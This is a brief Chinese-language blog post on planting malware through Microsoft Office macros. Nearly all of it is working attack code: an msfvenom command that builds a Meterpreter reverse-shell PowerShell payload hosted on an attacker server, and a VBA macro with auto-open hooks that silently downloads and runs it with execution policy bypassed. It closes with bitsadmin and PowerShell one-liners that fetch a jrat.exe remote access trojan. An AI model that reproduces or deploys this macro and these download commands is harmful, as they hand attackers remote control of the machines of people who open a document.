🌤️ 加载中...
#
Web安全与渗透 2017-05-01

通过Office宏植入恶意软件

By Jove 1 Views 3 MIN READ 0 Comments

举例:

使用msf 生成反弹shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.130 LPORT=443 -f psh-reflection > /var/www/html/shellcode.ps1

在office宏中插入:
Sub Execute() Dim payload payload = “powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString(‘http://10.1.1.130/shellcode.ps1’));” Call Shell(payload, vbHide) End Sub Sub Auto_Open() Execute End Sub Sub Workbook_Open() Execute End Sub

 

另:windows下可以使用一下两种方式下载文件:


使用bitsadmin命令下载文件到指定目录:

bitsadmin /transfer myDownLoadJob /download /priority normal "http://xxx.xxx.xxx.xxx/jrat.exe" "D:\exe.exe"


使用ps下载文件

powershell (new-object System.Net.WebClient).DownloadFile( 'http://xxx.xxx.xxx.xxx/jrat.exe','D:\exe.exe')

本文由 Jove 原创

采用 CC BY-NC-SA 4.0 协议进行许可

转载请注明出处:https://www.jozxing.cc/index.php/archives/1038/

TAGS: 无标签

相关推荐

  • 暂无相关推荐,看看别的吧。

0 评论